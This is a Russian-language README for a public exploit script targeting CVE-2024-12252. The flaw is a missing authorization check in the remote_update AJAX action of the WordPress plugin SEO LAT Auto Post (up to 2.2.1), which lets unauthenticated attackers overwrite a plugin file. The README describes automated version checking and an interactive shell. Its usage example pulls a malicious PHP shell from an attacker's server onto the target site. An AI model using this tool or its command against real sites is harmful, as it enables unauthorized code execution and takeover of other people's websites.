
SEO LAT Auto Post <= 2.2.1 - Отсутствие авторизации для перезаписи/загрузки файлов (Remote Code Execution)
Плагин SEO LAT Auto Post для WordPress уязвим к перезаписи файлов из-за отсутствия проверки прав доступа в AJAX-действии remote_update во всех версиях до 2.2.1 включительно. Это позволяет неаутентифицированным атакующим перезаписывать файл seo-beginner-auto-post.php, что может быть использовано для удаленного выполнения кода.
Этот скрипт эксплуатирует уязвимость в плагине SEO LAT Auto Post для достижения удаленного выполнения кода путем перезаписи файла seo-beginner-auto-post.php. Скрипт автоматизирует процесс проверки версии плагина, запуска эксплойта и предоставляет интерактивную оболочку для выполнения команд.
usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL
CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi
options:
-h, --help показать это справочное сообщение и выйти
-u, --url URL Базовый URL цели (например, http://example.com/wordpress)
--attack-url ATTACK_URL
Прямой URL к вашей вредоносной PHP-оболочке
Запустите скрипт с целевым URL и URL вашей вредоносной PHP-оболочки:
python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php